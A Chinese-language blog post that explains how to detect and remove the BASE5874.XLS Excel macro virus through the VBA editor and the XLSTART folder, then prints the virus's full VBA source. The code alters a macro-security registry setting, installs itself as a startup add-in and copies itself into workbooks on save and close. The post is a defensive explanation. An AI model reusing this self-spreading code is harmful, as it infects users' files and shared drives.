Environment-001 宏病毒
最近頻繁地遇到了宏病毒問題,雖然對RPA運行的環境影響不大,也不影響軟件的正常使用,但是宏病毒的傳播速度是真的快,包括本地電腦和服務器以及公共盤都發現了宏病毒文件,所以特意在環境文集的第一篇來講一下宏病毒
宏病毒的常見狀況:關閉Excel文件,文件會自動保存,即使未做更改也會自動保存(其實在自動保存的同時宏病毒代碼也會復制到其他文件進行傳播)
檢查是否中了宏病毒并處理:
打開Excel.exe
查看Excel的VBA代碼(Alt+F11),查看是否存在一個VBA Project(BASE5874.XLS),如果存在就代表中了宏病毒
雙擊ThisWorkbook可以看到宏病毒的代碼
全選中后刪除代碼,保存BASE5874.XLS

打開自己的最近打開的其他宏文件,同樣查看VBA代碼(Alt+F11),查看VBA Project-Excel Objects下的各頁是否有宏代碼,有的話就刪除,刪除後保存文件
打開(kāi)路徑C:\Users\XXXXXX\AppData\Roaming\Microsoft\Excel\XLSTART
將其中的BASE5874.XLS文件刪除(BASE5874.XLS文件就是化身為Excel自動加載文件並進行傳播寫入其他文件的)

再次打開Excel.exe,查看代碼,發現無VBA Project(BASE5874.XLS),Excel Objects - 各頁也無宏病毒代碼,即清理成功,如果依然存在則重復上述操作直至清理到不存在
下面讓我們來看一下宏病毒的代碼
宏病毒代碼:
Private Const cstrSection? ? ?As String = "Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
Private Const cstrEngine? ? ? As String = "BASE5874.XLS"
Private Const cstrModule? ? ? As String = "ThisWorkbook"
Private Const cstrKeyName? ? ?As String = "Options6"
Private Const cstrVolumeData? As String = "IVID"
Private Declare Function GetVolumeInformation Lib "KERNEL32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As Long, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As Long, ByVal nFileSystemNameSize As Long) As Long
Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long
Private Declare Function RegOpenKeyEx Lib "ADVAPI32.DLL" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "ADVAPI32.DLL" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "ADVAPI32.DLL" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private WithEvents mApp As Application
Private Sub Workbook_Open()
? Dim strEngine? ? ?As String
? Dim wbkEngine? ? ?As Workbook
? Dim cmdEngine? ? ?As Object
? Dim lngRegKey? ? ?As Long
? Dim lngRegType? ? As Long
? Dim lngRegValue? ?As Long
? Dim lngVolumeID? ?As Long
? On Error Resume Next
? If (RegOpenKeyEx(&H80000001, cstrSection, 0, &H2001F, lngRegKey) = 0) Then
? ? RegQueryValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue, 4
? ? RegSetValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue And Not 8, 4
? ? RegCloseKey lngRegKey
? End If
? strEngine = UCase$(Application.StartupPath + "\" + cstrEngine)
? If UCase$(Me.FullName) = strEngine Then
? ? Set mApp = Application
? ElseIf Len(Dir(strEngine)) = 0 Then
? ? Application.ScreenUpdating = False
? ? If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath
? ? Set wbkEngine = Workbooks.Add
? ? wbkEngine.IsAddin = True
? ? Intrude wbkEngine
? ? GetVolumeInformation Left$(strEngine, InStr(1, strEngine, "\")), 0, 0, lngVolumeID, 0, 0, 0, 0
? ? wbkEngine.CustomDocumentProperties.Add cstrVolumeData + Hex$(lngVolumeID), False, msoPropertyTypeString, ""
? ? wbkEngine.SaveAs strEngine, xlAddIn
? ? wbkEngine.Close
? ? If (lngRegValue And 8) = 8 Then
? ? ? Set cmdEngine = Me.VBProject.VBComponents(cstrModule).CodeModule
? ? ? cmdEngine.DeleteLines 1, cmdEngine.CountOfLines
? ? ? Me.Save
? ? End If
? ? Application.ScreenUpdating = True
? Else
? ? CopyVolumesData Workbooks(cstrEngine)
? End If
End Sub
Private Sub mApp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)
? On Error Resume Next
? Intrude Wb
End Sub
Private Sub mApp_WorkbookBeforeClose(ByVal Wb As Excel.Workbook, Cancel As Boolean)
? On Error Resume Next
? If Len(Wb.Path) <> 0 Then If Intrude(Wb) Then Wb.Save
End Sub
Private Function Intrude(wbkTarget As Workbook) As Boolean
? Dim cmdSource As Object
? Dim cmdTarget As Object
? On Error Resume Next
? Intrude = False
? Set cmdSource = Me.VBProject.VBComponents(cstrModule).CodeModule
? Set cmdTarget = wbkTarget.VBProject.VBComponents(cstrModule).CodeModule
? If cmdTarget.CountOfLines <= 2 Then
? ? cmdTarget.DeleteLines 1, cmdSource.CountOfLines
? ? cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)
? ? CopyVolumesData wbkTarget
? ? Intrude = True
? End If
End Function
Private Sub CopyVolumesData(wbkTarget As Workbook)
? Dim pptVolume As DocumentProperty
? On Error Resume Next
? For Each pptVolume In Me.CustomDocumentProperties
? ? If Left$(pptVolume.Name, Len(cstrVolumeData)) = cstrVolumeData Then
? ? ? wbkTarget.CustomDocumentProperties.Add pptVolume.Name, False, pptVolume.Type, ""
? ? ? wbkTarget.CustomDocumentProperties(pptVolume.Name).Value = pptVolume.Value
? ? End If
? Next
End Sub
代碼的內容是通過在打開和關閉Excel的時候把宏病毒代碼進行傳播,如果Excel的安全等級很高,自動加載、Macro等都被禁止的情況下,感染的幾率不大,但是為了方便開發和運行,我們的開發和業務人員都啟動了一些Excel自動功能,所以才給了宏病毒可乘之機。
目前通過很多人的宣傳和對多個設備、公共空間的清理,宏病毒已經很少出現了。